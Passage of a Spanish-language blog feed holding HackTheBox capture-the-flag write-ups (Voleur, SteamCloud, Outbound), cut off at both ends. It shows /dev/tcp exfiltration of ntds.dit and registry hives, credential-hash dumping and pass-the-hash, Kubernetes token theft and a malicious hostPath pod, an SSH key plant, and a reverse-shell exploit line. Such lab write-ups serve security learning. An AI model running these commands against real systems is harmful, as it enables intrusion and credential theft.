dc.voleur.htb Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Type help for list of commands # use IT # ls drw-rw-rw- 0 Wed Jan 29 04:10:01 2025 . drw-rw-rw- 0 Mon Jul 21 01:32:26 2025 .. drw-rw-rw- 0 Thu Jan 30 11:11:29 2025 Third-Line Support # cd Third-Line Support l# ls drw-rw-rw- 0 Thu Jan 30 11:11:29 2025 . drw-rw-rw- 0 Wed Jan 29 04:10:01 2025 .. -rw-rw-rw- 2602 Thu Jan 30 11:11:29 2025 id_rsa -rw-rw-rw- 186 Thu Jan 30 11:07:35 2025 Note.txt.txt # get id_rsa # get note.txt.txt # ``` `chmod 600 id_rsa` ```zsh cat note.txt.txt Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin ``` Tenemos un id_rsa pero no sabemos para que usuario es, para esto podemos usar ssh-keygen para darnos una pista. ```zsh ssh-keygen -y -f ./id_rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCoXI8y9RFb+pvJGV6YAzNo9W99Hsk0fOcvrEMc/ij+GpYjOfd1nro/ZpuwyBnLZdcZ/ak7QzXdSJ2IFoXd0s0vtjVJ5L8MyKwTjXXMfHoBAx6mPQwYGL9zVR+LutUyr5fo0mdva/mkLOmjKhs41aisFcwpX0OdtC6ZbFhcpDKvq+BKst3ckFbpM1lrc9ZOHL3CtNE56B1hqoKPOTc+xxy3ro+GZA/JaR5VsgZkCoQL951843OZmMxuft24nAgvlzrwwy4KL273UwDkUCKCc22C+9hWGr+kuSFwqSHV6JHTVPJSZ4dUmEFAvBXNwc11WT4Y743OHJE6q7GFppWNw7wvcow9g1RmX9zii/zQgbTiEC8BAgbI28A+4RcacsSIpFw2D6a8jr+wshxTmhCQ8kztcWV6NIod+Alw/VbcwwMBgqmQC5lMnBI/0hJVWWPhH+V9bXy0qKJe7KA4a52bcBtjrkKU7A/6xjv6tc5MDacneoTQnyAYSJLwMXM84XzQ4us= svc_backup@DC ``` ### SSH ```zsh ssh -i id_rsa svc_backup@voleur.htb -p 2222 ``` ![Image](image-12.png) ## Privilege Escalation ### NTDS Previamente ya nos hemos enfrentado con estos archivos en la maquina [Blackfield](https://racc0x.github.io/posts/blackfield/#privilege-escalation) ```zsh svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ls ntds.dit ntds.jfm svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ``` ```zsh kali > nc -nlvp 8888 > ntds.dit svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ cat ntds.dit > /dev/tcp/10.10.14.18/8888 kali > nc -nlvp 8888 > SYSTEM svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$ cat SYSTEM > /dev/tcp/10.10.14.18/8888 ``` ```zsh impacket-secretsdump -ntds ntds.dit -system SYSTEM local ``` ``` Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ``` ```zsh impacket-getTGT 'voleur.htb/Administrator' -hashes ':e656e07c56d831611b577b160b259ad2' -dc-ip 10.10.11.76 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in Administrator.ccache ``` ```zsh KRB5CCNAME=Administrator.ccache evil-winrm -i dc.voleur.htb -r voleur.htb ``` ![Image](image-13.png)"},{"id":"steamcloud","title":"HTB - SteamCloud","description":"HTB - SteamCloud","date":"2025-07-20T00:00:00.000Z","tags":["HackTheBox","Easy","kubernetes","API","Kubelet"],"authors":["r4cc0x"],"url":"/blog/steamcloud","content":"## Box Info | Name | SteamCloud | | :-------------------- | ---------------: | | Release Date | 14 Feb, 2022 | | OS | Linux | | Rated Difficulty | Easy | ``` ping -c 3 10.10.11.133 PING 10.10.11.133 (10.10.11.133) 56(84) bytes of data. 64 bytes from 10.10.11.133: icmp_seq=1 ttl=63 time=136 ms 64 bytes from 10.10.11.133: icmp_seq=2 ttl=63 time=127 ms 64 bytes from 10.10.11.133: icmp_seq=3 ttl=63 time=127 ms ``` Maquina Linux = ttl=63 -aprox-> 64 = Linux ## Recon ``` sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.11.133 -oG allPorts ``` ```zsh nmap -sCV -p 22,2379,2380,8443,10249,10250,10256 10.10.11.133 -oN targeted ``` ``` # Nmap 7.95 scan initiated Sat Jul 19 16:30:28 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 22,2379,2380,8443,10249,10250,10256 -oN targeted 10.10.11.133 Nmap scan report for 10.10.11.133 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA) | 256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA) |_ 256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519) 2379/tcp open ssl/etcd-client? | tls-alpn: |_ h2 | ssl-cert: Subject: commonName=steamcloud | Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1 | Not valid before: 2025-07-19T20:28:16 |_Not valid after: 2026-07-19T20:28:16 |_ssl-date: TLS randomness does not represent time 2380/tcp open ssl/etcd-server? | tls-alpn: |_ h2 | ssl-cert: Subject: commonName=steamcloud | Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1 | Not valid before: 2025-07-19T20:28:16 |_Not valid after: 2026-07-19T20:28:16 |_ssl-date: TLS randomness does not represent time 8443/tcp open ssl/http Golang net/http server |_http-title: Site doesn't have a title (application/json). | ssl-cert: Subject: commonName=minikube/organizationName=system:masters | Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1 | Not valid before: 2025-07-18T20:28:14 |_Not valid after: 2028-07-18T20:28:14 |_ssl-date: TLS randomness does not represent time | tls-alpn: | h2 |_ http/1.1 | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 403 Forbidden | Audit-Id: 1d460ee6-1430-4726-90ce-1fbb22b04d1f | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 05c1fea2-8bb7-4883-b2c9-c7cb1a35f9be | X-Kubernetes-Pf-Prioritylevel-Uid: 3c8f7408-9b5f-41e9-87f3-ea587eab9be4 | Date: Sat, 19 Jul 2025 20:30:43 GMT | Content-Length: 212 | {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden: User \"system:anonymous\" cannot get path \"/nice ports,/Trinity.txt.bak\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403} | GetRequest: | HTTP/1.0 403 Forbidden | Audit-Id: 25f5481e-d3bf-449a-964d-08efe25470d8 | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 05c1fea2-8bb7-4883-b2c9-c7cb1a35f9be | X-Kubernetes-Pf-Prioritylevel-Uid: 3c8f7408-9b5f-41e9-87f3-ea587eab9be4 | Date: Sat, 19 Jul 2025 20:30:42 GMT | Content-Length: 185 | {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden: User \"system:anonymous\" cannot get path \"/\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403} | HTTPOptions: | HTTP/1.0 403 Forbidden | Audit-Id: 983172a4-6912-47f0-bb1c-b4794baf14c8 | Cache-Control: no-cache, private | Content-Type: application/json | X-Content-Type-Options: nosniff | X-Kubernetes-Pf-Flowschema-Uid: 05c1fea2-8bb7-4883-b2c9-c7cb1a35f9be | X-Kubernetes-Pf-Prioritylevel-Uid: 3c8f7408-9b5f-41e9-87f3-ea587eab9be4 | Date: Sat, 19 Jul 2025 20:30:42 GMT | Content-Length: 189 |_ {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"forbidden: User \"system:anonymous\" cannot options path \"/\"\",\"reason\":\"Forbidden\",\"details\":{},\"code\":403} 10249/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Site doesn't have a title (text/plain; charset=utf-8). 10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_ssl-date: TLS randomness does not represent time |_http-title: Site doesn't have a title (text/plain; charset=utf-8). | ssl-cert: Subject: commonName=steamcloud@1752956898 | Subject Alternative Name: DNS:steamcloud | Not valid before: 2025-07-19T19:28:18 |_Not valid after: 2026-07-19T19:28:18 | tls-alpn: | h2 |_ http/1.1 10256/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Site doesn't have a title (text/plain; charset=utf-8). 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=7/19%Time=687C0072%P=x86_64-pc-linux-gn SF:u%r(GetRequest,22F,\"HTTP/1\\.0\\x20403\\x20Forbidden\\r\\nAudit-Id:\\x2025f54 SF:81e-d3bf-449a-964d-08efe25470d8\\r\\nCache-Control:\\x20no-cache,\\x20priva SF:te\\r\\nContent-Type:\\x20application/json\\r\\nX-Content-Type-Options:\\x20n SF:osniff\\r\\nX-Kubernetes-Pf-Flowschema-Uid:\\x2005c1fea2-8bb7-4883-b2c9-c7 SF:cb1a35f9be\\r\\nX-Kubernetes-Pf-Prioritylevel-Uid:\\x203c8f7408-9b5f-41e9- SF:87f3-ea587eab9be4\\r\\nDate:\\x20Sat,\\x2019\\x20Jul\\x202025\\x2020:30:42\\x20 SF:GMT\\r\\nContent-Length:\\x20185\\r\\n\\r\\n{\\\"kind\\\":\\\"Status\\\",\\\"apiVersion\\ SF:\":\\\"v1\\\",\\\"metadata\\\":{},\\\"status\\\":\\\"Failure\\\",\\\"message\\\":\\\"forbidden SF::\\x20User\\x20\\\\\\\"system:anonymous\\\\\\\"\\x20cannot\\x20get\\x20path\\x20\\\\\\\"/ SF:\\\\\\\"\\\",\\\"reason\\\":\\\"Forbidden\\\",\\\"details\\\":{},\\\"code\\\":403}\\n\")%r(HTTP SF:Options,233,\"HTTP/1\\.0\\x20403\\x20Forbidden\\r\\nAudit-Id:\\x20983172a4-691 SF:2-47f0-bb1c-b4794baf14c8\\r\\nCache-Control:\\x20no-cache,\\x20private\\r\\nC SF:ontent-Type:\\x20application/json\\r\\nX-Content-Type-Options:\\x20nosniff\\ SF:r\\nX-Kubernetes-Pf-Flowschema-Uid:\\x2005c1fea2-8bb7-4883-b2c9-c7cb1a35f SF:9be\\r\\nX-Kubernetes-Pf-Prioritylevel-Uid:\\x203c8f7408-9b5f-41e9-87f3-ea SF:587eab9be4\\r\\nDate:\\x20Sat,\\x2019\\x20Jul\\x202025\\x2020:30:42\\x20GMT\\r\\n SF:Content-Length:\\x20189\\r\\n\\r\\n{\\\"kind\\\":\\\"Status\\\",\\\"apiVersion\\\":\\\"v1\\ SF:\",\\\"metadata\\\":{},\\\"status\\\":\\\"Failure\\\",\\\"message\\\":\\\"forbidden:\\x20Us SF:er\\x20\\\\\\\"system:anonymous\\\\\\\"\\x20cannot\\x20options\\x20path\\x20\\\\\\\"/\\\\\\ SF:\"\\\",\\\"reason\\\":\\\"Forbidden\\\",\\\"details\\\":{},\\\"code\\\":403}\\n\")%r(FourOhF SF:ourRequest,24A,\"HTTP/1\\.0\\x20403\\x20Forbidden\\r\\nAudit-Id:\\x201d460ee6- SF:1430-4726-90ce-1fbb22b04d1f\\r\\nCache-Control:\\x20no-cache,\\x20private\\r SF:\\nContent-Type:\\x20application/json\\r\\nX-Content-Type-Options:\\x20nosni SF:ff\\r\\nX-Kubernetes-Pf-Flowschema-Uid:\\x2005c1fea2-8bb7-4883-b2c9-c7cb1a SF:35f9be\\r\\nX-Kubernetes-Pf-Prioritylevel-Uid:\\x203c8f7408-9b5f-41e9-87f3 SF:-ea587eab9be4\\r\\nDate:\\x20Sat,\\x2019\\x20Jul\\x202025\\x2020:30:43\\x20GMT\\ SF:r\\nContent-Length:\\x20212\\r\\n\\r\\n{\\\"kind\\\":\\\"Status\\\",\\\"apiVersion\\\":\\\" SF:v1\\\",\\\"metadata\\\":{},\\\"status\\\":\\\"Failure\\\",\\\"message\\\":\\\"forbidden:\\x2 SF:0User\\x20\\\\\\\"system:anonymous\\\\\\\"\\x20cannot\\x20get\\x20path\\x20\\\\\\\"/nice SF:\\x20ports,/Trinity\\.txt\\.bak\\\\\\\"\\\",\\\"reason\\\":\\\"Forbidden\\\",\\\"details\\\" SF::{},\\\"code\\\":403}\\n\"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 19 16:31:17 2025 -- 1 IP address (1 host up) scanned in 48.39 seconds ``` Nmap ya nos reporta en el puerto 8443 que se esta empleando kubernetes. # Kubernetes https://etcd.io/docs/v3.2/op-guide/security/ - Expuesto el servicio `etcd`: actúa como una base de datos distribuida para la configuración, el estado y los metadatos, especialmente en entornos de Kubernetes. **8443/TCP - kube-apiserver - Minikube API port** ![Image](image.png) ### Enumerate Directory De forma predeterminada, los endpoints de la API tienen prohibido el acceso anónimo. Sin embargo, siempre es recomendable comprobar si existen endpoints inseguros que expongan información confidencial: ```zsh dirsearch -u https://10.10.11.133:8443/ Target: https://10.10.11.133:8443/ [16:57:31] Starting: [16:57:56] 403 - 311B - /api/2/explore/ [16:57:56] 403 - 345B - /api/2/issue/createmeta [16:57:56] 403 - 326B - /api/apidocs/swagger.json [16:57:56] 403 - 311B - /api/cask/graphql [16:57:56] 403 - 342B - /api/package_search/v4/documentation [16:57:56] 403 - 308B - /api/jsonws/invoke [16:57:56] 403 - 326B - /api/spec/swagger.json [16:57:56] 403 - 326B - /api/swagger/ui/index [16:57:56] 403 - 320B - /api/swagger/index.html [16:57:56] 403 - 311B - /api/swagger/swagger [16:57:56] 403 - 348B - /api/swagger/static/index.html [16:57:56] 403 - 299B - /api/timelion/run [16:57:56] 403 - 326B - /api/v1/swagger.json [16:57:56] 403 - 326B - /api/v1/swagger.yaml [16:57:56] 403 - 326B - /api/v2/swagger.json [16:57:56] 403 - 350B - /api/v2/helpdesk/discover [16:57:56] 403 - 326B - /api/v2/swagger.yaml [16:57:56] 403 - 353B - /api/vendor/phpunit/phpunit/phpunit [16:58:10] 200 - 2B - /healthz [16:58:37] 200 - 263B - /version/ [16:58:37] 200 - 263B - /version ``` https://hacktricks.boitatech.com.br/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside ## Kubelet API ```zsh curl -k https:// :10250 curl -k https:// :10250/metrics curl -k https:// :10250/pods ``` ### Enumerate Directory ```zsh dirsearch -u https://10.10.11.133:10250/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt ``` ```zsh [17:37:44] Starting: [17:37:47] 301 - 42B - /stats -> /stats/ [17:37:54] 404 - 19B - /exec [17:37:58] 301 - 41B - /logs -> /logs/ [17:38:15] 404 - 19B - /attach [17:38:21] 404 - 19B - /run [17:38:30] 200 - 212KB - /metrics [17:39:48] 301 - 45B - /http%3A%2F%2Fwww -> /http:/www [17:40:56] 200 - 37KB - /pods ``` ```zsh curl -l \"https://10.10.11.133:10250/pods\" | jq ``` Otra manera de visualizarlo es mediante la web. **10250/TCP - kubelet - HTTPS API which allows full mode access ** ![Image](image-1.png) Con la herramienta [kubeletctl](https://github.com/cyberark/kubeletctl) que es un cliente para kubernetes podriamos de igual forma enumerar los ``pods`` junto los ``namespace`` ```zsh kubeletctl -s 10.10.11.133 pods ``` ![Image](image-2.png) [Using Kubelet client to attack the kubernetes cluster](https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster) ``` kubeletctl -s 10.10.11.133 scan --help ``` ```zsh Usage: kubeletctl scan [flags] kubeletctl scan [command]w Available Commands: rce Scans for nodes with opened kubelet API token Scans for for all the tokens in a given Node. ``` Con el comando `rce` se utiliza para escanear un servidor de Kubelet en busca de vulnerabilidades que permitan ejecución remota de código (RCE). ```zsh kubeletctl -s 10.10.11.133 scan rce ``` ![Image](image-3.png) Como se puede ver, revela que pods/containers podría ejecutar comandos arbitrarios en el nodo de Kubernetes. ```zsh kubeletctl -s 10.10.11.133 -p nginx -n default -c nginx exec \"whoami\" ``` ![Image](image-4.png) ```zsh kubeletctl -s 10.10.11.133 -p nginx -n default -c nginx exec \"bash\" ``` ![Image](image-5.png) [enumeration-from-a-pod)](https://hacktricks.boitatech.com.br/pentesting/pentesting-kubernetes/enumeration-from-a-pod) - Transferimos los archivos a nuestra maquina. `/run/secrets/kubernetes.io/serviceaccount/ca.crt` `/run/secrets/kubernetes.io/serviceaccount/token` O desde el comando incluso podemos transferirnos el archivo ```zsh kubeletctl -s 10.10.11.133 -p nginx -n default -c nginx exec \"cat /run/secrets/kubernetes.io/serviceaccount/token\" > token ``` ```zsh kubectl -s https://10.10.11.133:8443 auth --token \"eyJhbGciOiJSUzI1NiIsImtpZCI6IkdiNmNfSTJsbUl3R3VxTHdTWWloNVJSenJxaVBNUmlMZWR0OUtpS3p2S3cifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzg0NTAxNzEzLCJpYXQiOjE3NTI5NjU3MTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjIwNDQ3ODJiLTNhNmQtNGEzZi05ZmFkLTBhMjE1YjkxMjJhYSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImY4MmM3NjY1LTFlNGUtNDVhNi05MWIxLWM5MTExZjA2NDI4NCJ9LCJ3YXJuYWZ0ZXIiOjE3NTI5NjkzMjB9LCJuYmYiOjE3NTI5NjU3MTMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.fkC7k-puLpJWTQdaihrL9ZJhhAcVOlii0JCZosqb1wnMqah0wxDHoRphhCZ4QhK0kdPw4slRjeLvAeXeOKgWgoruH3c-N1K6Tgx5wz30rDNosqeD-87ygGe8ldKodnFe84-l_XWpBAk_yU1M5Ogs125dJdpGBas2euTuchIPiqTYjJ9PqLNzphxYt6IdTM3JsnVoRPKOP52v8O91AO03Tip3M4rRW7CqHrKDx6qPQeqPwGJrpgGKtCSpK3feUQJpTjDGtIlBrWLE4Zs39yV01aoi7GR7q-UDZ-9E2wMlTbJxc8vI0R3odyGLXtOrZjvOVenvdo7zZpqfc533HIdyTA\" --certificate-authority=ca.crt can-i create pod ``` ![Image](image-6.png) ## Create Malicious Pod Vamos a tomar de refencia el pod de nginx para poder crear nuestro pod maclioso. ```zsh kubectl -s https://10.10.11.133:8443 --token='eyJhbGciOiJSUzI1NiIsImtpZCI6IkdiNmNfSTJsbUl3R3VxTHdTWWloNVJSenJxaVBNUmlMZWR0OUtpS3p2S3cifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzg0NTAxNzEzLCJpYXQiOjE3NTI5NjU3MTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjIwNDQ3ODJiLTNhNmQtNGEzZi05ZmFkLTBhMjE1YjkxMjJhYSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImY4MmM3NjY1LTFlNGUtNDVhNi05MWIxLWM5MTExZjA2NDI4NCJ9LCJ3YXJuYWZ0ZXIiOjE3NTI5NjkzMjB9LCJuYmYiOjE3NTI5NjU3MTMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.fkC7k-puLpJWTQdaihrL9ZJhhAcVOlii0JCZosqb1wnMqah0wxDHoRphhCZ4QhK0kdPw4slRjeLvAeXeOKgWgoruH3c-N1K6Tgx5wz30rDNosqeD-87ygGe8ldKodnFe84-l_XWpBAk_yU1M5Ogs125dJdpGBas2euTuchIPiqTYjJ9PqLNzphxYt6IdTM3JsnVoRPKOP52v8O91AO03Tip3M4rRW7CqHrKDx6qPQeqPwGJrpgGKtCSpK3feUQJpTjDGtIlBrWLE4Zs39yV01aoi7GR7q-UDZ-9E2wMlTbJxc8vI0R3odyGLXtOrZjvOVenvdo7zZpqfc533HIdyTA' --certificate-authority=ca.crt get pod nginx -o yaml ``` Lo ajustamos para que obtenga la raiz `/mnt` de la maquina steamcloud (10.10.11.133) ```js apiVersion: v1 kind: Pod metadata: name: pwn namespace: default spec: containers: - image: nginx:1.14.2 name: pwn volumeMounts: - mountPath: /mnt name: flag volumes: - hostPath: path: / name: flag ``` ```zsh kubectl -s https://10.10.11.133:8443 create -f evil.yaml --token='eyJhbGciOiJSUzI1NiIsImtpZCI6IkdiNmNfSTJsbUl3R3VxTHdTWWloNVJSenJxaVBNUmlMZWR0OUtpS3p2S3cifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzg0NTAxNzEzLCJpYXQiOjE3NTI5NjU3MTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjIwNDQ3ODJiLTNhNmQtNGEzZi05ZmFkLTBhMjE1YjkxMjJhYSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImY4MmM3NjY1LTFlNGUtNDVhNi05MWIxLWM5MTExZjA2NDI4NCJ9LCJ3YXJuYWZ0ZXIiOjE3NTI5NjkzMjB9LCJuYmYiOjE3NTI5NjU3MTMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.fkC7k-puLpJWTQdaihrL9ZJhhAcVOlii0JCZosqb1wnMqah0wxDHoRphhCZ4QhK0kdPw4slRjeLvAeXeOKgWgoruH3c-N1K6Tgx5wz30rDNosqeD-87ygGe8ldKodnFe84-l_XWpBAk_yU1M5Ogs125dJdpGBas2euTuchIPiqTYjJ9PqLNzphxYt6IdTM3JsnVoRPKOP52v8O91AO03Tip3M4rRW7CqHrKDx6qPQeqPwGJrpgGKtCSpK3feUQJpTjDGtIlBrWLE4Zs39yV01aoi7GR7q-UDZ-9E2wMlTbJxc8vI0R3odyGLXtOrZjvOVenvdo7zZpqfc533HIdyTA' --certificate-authority=ca.crt pod/pwn created ``` Podemos verificar de esta manera si nuestro pod fue creado y como podemos ver nuestro pod puede ejecutar comandos ```zsh kubeletctl -s 10.10.11.133 scan rce ``` ![Image](image-7.png) ```zsh kubeletctl -s 10.10.11.133 -p pwn -n default -c pwn exec \"bash\" ``` ![Image](image-8.png) si nos dirigimos al `/mnt` podremos ver otra raíz e incluso podemos ver la flag de root.txt de la maquina steamcloud. creamos claves ssh para conectarnos sin proveer contraseña. `ssh-keygen` ``` cat id_ed25519.pub| tr -d '\\n' | xclip -sel clip ``` - steamcloud machine ``` echo \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJQfXv3MLXm6Nyh+SgtGlM0JCaDM9UeOCWxl7 root@kali\" > authorized_keys ``` ```zsh ssh root@10.10.11.133 ``` ![Image](image-9.png)"},{"id":"outbound","title":"HTB - Outbound","description":"HTB - Outbound","date":"2025-07-14T00:00:00.000Z","tags":["HackTheBox","Easy","CVE-2025-49113","RCE","mysql","decrypt","CVE-2025-27591","Misconfiguration"],"authors":["r4cc0x"],"url":"/blog/outbound","content":"## Box Info | Name | Outbound | | :-------------------- | ---------------: | | Release Date | 12 Jul, 2025 | | OS | Linux | | Rated Difficulty | Easy | - Machine Information As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2 ```zsh ping -c 3 10.10.11.77 PING 10.10.11.77 (10.10.11.77) 56(84) bytes of data. 64 bytes from 10.10.11.77: icmp_seq=1 ttl=63 time=128 ms 64 bytes from 10.10.11.77: icmp_seq=2 ttl=63 time=129 ms 64 bytes from 10.10.11.77: icmp_seq=3 ttl=63 time=128 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.11.77 -oG allPorts ``` ```zsh nmap -sCV -p 22,80 10.10.11.77 -oN targeted ``` ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 09:05 EDT Nmap scan report for 10.10.11.77 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA) |_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Did not follow redirect to http://mail.outbound.htb/ |_http-server-header: nginx/1.24.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```zsh echo \"10.10.11.77 mail.outbound.htb\" | sudo tee -a /etc/hosts ``` `http://mail.outbound.htb` ![Image](image.png) >Tip : [*nuclei](https://github.com/projectdiscovery/nuclei) -u http://mail.outbound.htb/* ## CVE-2025-49113 Podemos ver la version de roundcube webmail en el aparto de about. ![Image](image-1.png) Si realizamos una busqueda de algun exploit encontraremos lo siguiente: https://www.offsec.com/blog/cve-2025-49113/ Nos habla de un RCE en las versiones ( & /dev/tcp/10.10.14.18/443 0>&1'\" [+] Starting exploit (CVE-2025-49113)... [*] Checking Roundcube version... [*] Detected Roundcube version: 10610 [+] Target is vulnerable! [+] Login successful! [*] Exploiting... ``` Nos encontramos en un contenedor docker. ```zsh ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0@if4: mtu 1500 qdisc noqueue state UP group default link/ether 6a:51:1a:8b:1b:ef brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0 valid_lft forever preferred_lft forever ``` Encontramos 3 usuarios, de los cuales solo tyler podriamos acceder pues tenemos sus credenciales. ![Image](image-3.png) ``` su tyler password: LhKL1o9Nm3X2 ``` ![Image](image-4.png) subimos LinPEAS.sh para enumerar formas de escalar privilegios. ```zsh [+] Searching mysql credentials and exec From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: Found readable /etc/mysql/my.cnf [client-server] socket = /run/mysqld/mysqld.sock !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mariadb.conf.d/ Found lib_mysqludf_sys.so: If you can login in MySQL you can execute commands doing: SELECT sys_eval('id'); Found lib_mysqludf_sys.so: If you can login in MySQL you can execute commands doing: SELECT sys_eval('id'); ``` Lo unico interesante o que llama la atencion es que hay un mysql ejecutandose localmente. Por otro lado si buscamos algun archivo config para el servicio Webmail podemos encontrar una ruta familiar `/var/www/html/roundcube/config/config.inc.php` de la cual obtenemos las credenciales del mysql. ![Image](image-5.png) ```zsh mysql -u roundcube -p\"RCDBPass2025\" -h localhost roundcube -e 'use roundcube;select * from users;' -E ``` ``` *************************** 1. row *************************** user_id: 1 username: jacob mail_host: localhost created: 2025-06-07 13:55:18 last_login: 2025-06-11 07:52:49 failed_login: 2025-06-11 07:51:32 failed_login_counter: 1 language: en_US preferences: a:1:{s:11:\"client_hash\";s:16:\"hpLLqLwmqbyihpi7\";} *************************** 2. row *************************** user_id: 2 username: mel mail_host: localhost created: 2025-06-08 